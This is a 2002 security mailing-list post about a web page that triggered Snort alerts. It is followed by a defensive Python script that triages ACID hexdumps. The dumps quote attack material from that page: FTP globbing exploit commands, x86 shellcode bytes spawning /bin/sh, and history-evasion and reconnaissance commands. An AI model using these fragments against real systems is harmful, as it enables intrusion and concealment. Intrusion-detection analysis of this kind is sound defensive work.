[Dshield] Rating Attackers

John Sage jsage at finchhaven.com
Fri Aug 2 08:48:04 GMT 2002


umm..

On Tue, Jul 30, 2002 at 08:59:33PM -0400, Toby Miller wrote:
> All,
> Here's the scoop. I have come up with a model to help rate attackers. I want
> this model to eventually profile attackers but we need to take one step at a
> time. This model is nowhere near done and I need the community's help.
> Please read the paper and if you have any comments please send them to me.
> The link is http://www.incidents.org/detect/rating.html.
> 
> 
> 									Thanks,

Not to pick, but that web page sets off snort, big time. Freaked the
sh*t out of me until I figured out what was going on, since I first saw
the alert out on my firewall box, and the destination port says that
the packet contents were getting through into one of my interior
boxes...

After I calm back down, I might actually *read* the page :-/


Generated by ACID v0.9.6b21 on Fri August 02, 2002 01:37:59

------------------------------------------------------------------------------
#(312 - 509) [2002-08-02 01:28:26]  ATTACK RESPONSES id check returned root
IPv4: 63.100.47.45 -> 12.82.128.175
      hlen=5 TOS=0 dlen=1500 ID=27816 flags=0 offset=0 TTL=49 chksum=56289
TCP:  port=80 -> dport: 61328  flags=***A**** seq=2179452434
      ack=1695738445 off=8 res=0 win=7504 urp=0 chksum=856
      Options:
       #1 - NOP len=0
       #2 - NOP len=0
       #3 - TS len=10 data=106616AB061AAE39
Payload:  length = 1448

000 : 2F 0D 0A 33 35 30 20 46 69 6C 65 20 65 78 69 73   /..350 File exis
010 : 74 73 2C 20 72 65 61 64 79 20 66 6F 72 20 64 65   ts, ready for de
020 : 73 74 69 6E 61 74 69 6F 6E 20 6E 61 6D 65 0D 0A   stination name..
030 : 3C 2F 70 72 65 3E 0D 0A 0D 0A 3C 68 34 3E 34 29   </pre>....<h4>4)
040 : 20 41 74 74 61 63 6B 65 72 20 62 65 67 69 6E 73    Attacker begins
050 : 20 74 6F 20 67 6C 6F 62 3A 3C 2F 68 34 3E 0D 0A    to glob:</h4>..
060 : 0D 0A 3C 70 72 65 3E 0D 0A 43 57 44 20 30 30 30   ..<pre>..CWD 000
070 : 30 30 30 30 30 30 0D 0A 66 61 65 0D 0A 30 30 30   000000..fae..000
080 : 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30   0000000000000000
090 : 28 63 75 74 20 66 6F 72 20 70 75 62 6C 69 63 61   (cut for publica
0a0 : 74 69 6F 6E 29 0D 0A 43 57 44 20 7E 2F 7B 2E 2C   tion)..CWD ~/{.,
0b0 : 2E 2C 2E 2C 2E 7D 0D 0A 32 35 30 20 43 57 44 20   .,.,.}..250 CWD 
0c0 : 63 6F 6D 6D 61 6E 64 20 73 75 63 63 65 73 73 66   command successf
0d0 : 75 6C 2E 0D 0A 43 57 44 20 2E 0D 0A 32 35 30 20   ul...CWD ...250 
0e0 : 43 57 44 20 63 6F 6D 6D 61 6E 64 20 73 75 63 63   CWD command succ
0f0 : 65 73 73 66 75 6C 2E 0D 0A 52 4E 46 52 20 2E 2F   essful...RNFR ./
100 : 2E 2F 2E 2F 2E 2F 2E 2F 2E 2F 2E 2F 2E 2F 2E 0D   ./././././././..
110 : 0A 33 35 30 20 46 69 6C 65 20 65 78 69 73 74 73   .350 File exists
120 : 2C 20 72 65 61 64 79 20 66 6F 72 20 64 65 73 74   , ready for dest
130 : 69 6E 61 74 69 6F 6E 20 6E 61 6D 65 0D 0A 43 57   ination name..CW
140 : 44 20 37 33 35 30 37 33 0D 0A 35 35 30 20 37 33   D 735073..550 73
<snip>

------------------------------------------------------------------------------
#(312 - 510) [2002-08-02 01:28:28]  ATTACK RESPONSES id check returned root
IPv4: 63.100.47.45 -> 12.82.128.175
      hlen=5 TOS=0 dlen=1500 ID=27818 flags=0 offset=0 TTL=49 chksum=56287
TCP:  port=80 -> dport: 61328  flags=***A**** seq=2179453882
      ack=1695738445 off=8 res=0 win=7504 urp=0 chksum=49199
      Options:
       #1 - NOP len=0
       #2 - NOP len=0
       #3 - TS len=10 data=1066175F061AAEED
Payload:  length = 1448

000 : B0 46 33 C9 CD 80 6A 54 8B DC B0 27 B1 ED CD 80   .F3...jT...'....
010 : B0 3D CD 80 52 B1 10 68 2F 44 E2 F8 8B DC B0 3D   .=..R..h/D.....=
020 : CD 80 58 6A 54 6A 28 58 CD 80 6A 0D 0A 58 99 52   ..XjTj(X..j..X.R
030 : 68 6E 2F 73 68 68 2F 2F 62 69 89 E3 52 53 89 E1   hn/shh//bi..RS..
040 : CD 80 E1 CD 80 75 6E 73 65 74 20 48 49 53 54 46   .....unset HISTF
050 : 49 4C 45 3B 69 64 3B 75 6E 61 6D 65 20 2D 61 3B   ILE;id;uname -a;
060 : 0D 0A 75 69 64 3D 30 28 72 6F 6F 74 29 20 67 69   ..uid=0(root) gi
070 : 64 3D 30 28 72 6F 6F 74 29 20 67 72 6F 75 70 73   d=0(root) groups
080 : 3D 35 30 28 66 74 70 29 0D 0A 4C 69 6E 75 78 20   =50(ftp)..Linux 
090 : 61 6C 6C 69 67 61 74 6F 72 31 32 20 32 2E 34 2E   alligator12 2.4.
0a0 : 37 2D 31 30 20 23 31 20 54 68 75 20 53 65 70 20   7-10 #1 Thu Sep 
0b0 : 36 20 31 37 3A 32 31 3A 32 38 20 45 44 54 20 32   6 17:21:28 EDT 2
0c0 : 30 30 31 20 69 35 38 36 20 75 6E 6B 6E 6F 77 6E   001 i586 unknown
0d0 : 0D 0A 6D 6B 64 69 72 20 2F 75 73 72 2F 2E 73 6E   ..mkdir /usr/.sn
0e0 : 6D 70 0D 0A 63 64 20 2F 75 73 72 2F 2E 73 6E 6D   mp..cd /usr/.snm
0f0 : 70 0D 0A 77 67 65 74 0D 0A 77 67 65 74 3A 20 6D   p..wget..wget: m
<snip>

------------------------------------------------------------------------------
#(312 - 511) [2002-08-02 01:28:30]  ATTACK RESPONSES id check returned root
IPv4: 63.100.47.45 -> 12.82.128.175
      hlen=5 TOS=0 dlen=1500 ID=27822 flags=0 offset=0 TTL=49 chksum=56283
TCP:  port=80 -> dport: 61328  flags=***A**** seq=2179453882
      ack=1695738445 off=8 res=0 win=7504 urp=0 chksum=48929
      Options:
       #1 - NOP len=0
       #2 - NOP len=0
       #3 - TS len=10 data=106617E6061AAF74
Payload:  length = 1448

000 : B0 46 33 C9 CD 80 6A 54 8B DC B0 27 B1 ED CD 80   .F3...jT...'....
010 : B0 3D CD 80 52 B1 10 68 2F 44 E2 F8 8B DC B0 3D   .=..R..h/D.....=
020 : CD 80 58 6A 54 6A 28 58 CD 80 6A 0D 0A 58 99 52   ..XjTj(X..j..X.R
030 : 68 6E 2F 73 68 68 2F 2F 62 69 89 E3 52 53 89 E1   hn/shh//bi..RS..
040 : CD 80 E1 CD 80 75 6E 73 65 74 20 48 49 53 54 46   .....unset HISTF
050 : 49 4C 45 3B 69 64 3B 75 6E 61 6D 65 20 2D 61 3B   ILE;id;uname -a;
060 : 0D 0A 75 69 64 3D 30 28 72 6F 6F 74 29 20 67 69   ..uid=0(root) gi
070 : 64 3D 30 28 72 6F 6F 74 29 20 67 72 6F 75 70 73   d=0(root) groups
080 : 3D 35 30 28 66 74 70 29 0D 0A 4C 69 6E 75 78 20   =50(ftp)..Linux 
090 : 61 6C 6C 69 67 61 74 6F 72 31 32 20 32 2E 34 2E   alligator12 2.4.
0a0 : 37 2D 31 30 20 23 31 20 54 68 75 20 53 65 70 20   7-10 #1 Thu Sep 
0b0 : 36 20 31 37 3A 32 31 3A 32 38 20 45 44 54 20 32   6 17:21:28 EDT 2

<snip>

- John
-- 
Most people don't type their own logfiles;  but, what do I care?

PGP key:     http://www.finchhaven.com/pages/gpg_pubkey.html
Fingerprint: C493 9F26 05A9 6497 9800  4EF6 5FC8 F23D 35A4 F705
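Added example, not part of John's post or of the Snort/ACID tooling: a small Python triage helper that rebuilds the payload bytes from ACID hexdump rows like the ones above, locates the "uid=0(root)" string the rule name refers to, and uses the source port plus any HTML tags in the payload to separate a string served inside a web page (this case) from one echoed back by some other service. The web-port set, the tag list and the FTP contrast alert are assumptions or constructed for the example.

```python
import re

# Constructed sample: the TCP line and five payload rows copied from alert #510
# above, in the ACID/Snort hexdump layout "OFF : XX XX ... XX   ascii".
WEB_ALERT = """\
TCP:  port=80 -> dport: 61328  flags=***A**** seq=2179453882
040 : CD 80 E1 CD 80 75 6E 73 65 74 20 48 49 53 54 46   .....unset HISTF
050 : 49 4C 45 3B 69 64 3B 75 6E 61 6D 65 20 2D 61 3B   ILE;id;uname -a;
060 : 0D 0A 75 69 64 3D 30 28 72 6F 6F 74 29 20 67 69   ..uid=0(root) gi
070 : 64 3D 30 28 72 6F 6F 74 29 20 67 72 6F 75 70 73   d=0(root) groups
080 : 3D 35 30 28 66 74 70 29 0D 0A 4C 69 6E 75 78 20   =50(ftp)..Linux 
"""
# Constructed contrast case: the same string on an FTP control channel (port 21).
FTP_ALERT = """\
TCP:  port=21 -> dport: 1054  flags=***AP*** seq=1
000 : 75 69 64 3D 30 28 72 6F 6F 74 29 20 67 69 64 3D   uid=0(root) gid=
"""

SIGNATURE = b"uid=0(root)"          # the content the rule name refers to
WEB_SERVER_PORTS = {80, 443, 8080}  # assumption: ports an HTTP response comes from
DUMP_ROW = re.compile(r"^\s*[0-9A-Fa-f]+ : ((?:[0-9A-F]{2} ?){1,16})")
PORTS = re.compile(r"port=(\d+) -> dport: (\d+)")

def parse_acid_dump(text):
    """Rebuild payload bytes from the hex column of each row (ASCII column ignored)."""
    payload = bytearray()
    for line in text.splitlines():
        m = DUMP_ROW.match(line)
        if m:
            payload += bytes.fromhex(m.group(1))  # fromhex skips the spaces
    return bytes(payload)

def find_signature(payload, sig=SIGNATURE):
    """Return (offset, 16 bytes of context either side) for each hit of sig."""
    hits, pos = [], payload.find(sig)
    while pos != -1:
        hits.append((pos, payload[max(0, pos - 16):pos + len(sig) + 16]))
        pos = payload.find(sig, pos + 1)
    return hits

def triage(alert_text):
    """Classify an 'id check returned root' hit: text served by a web server
    (as in the alerts above) versus a service actually echoing id output."""
    payload = parse_acid_dump(alert_text)
    if not find_signature(payload):
        return "no-match"
    m = PORTS.search(alert_text)
    sport = int(m.group(1)) if m else None
    html = re.search(rb"</?(pre|h\d|html|body)>", payload, re.I) is not None
    if sport in WEB_SERVER_PORTS or html:
        return "likely-web-content"     # inspect the page itself, not the host
    return "possible-shell-response"    # treat as a compromise indicator
```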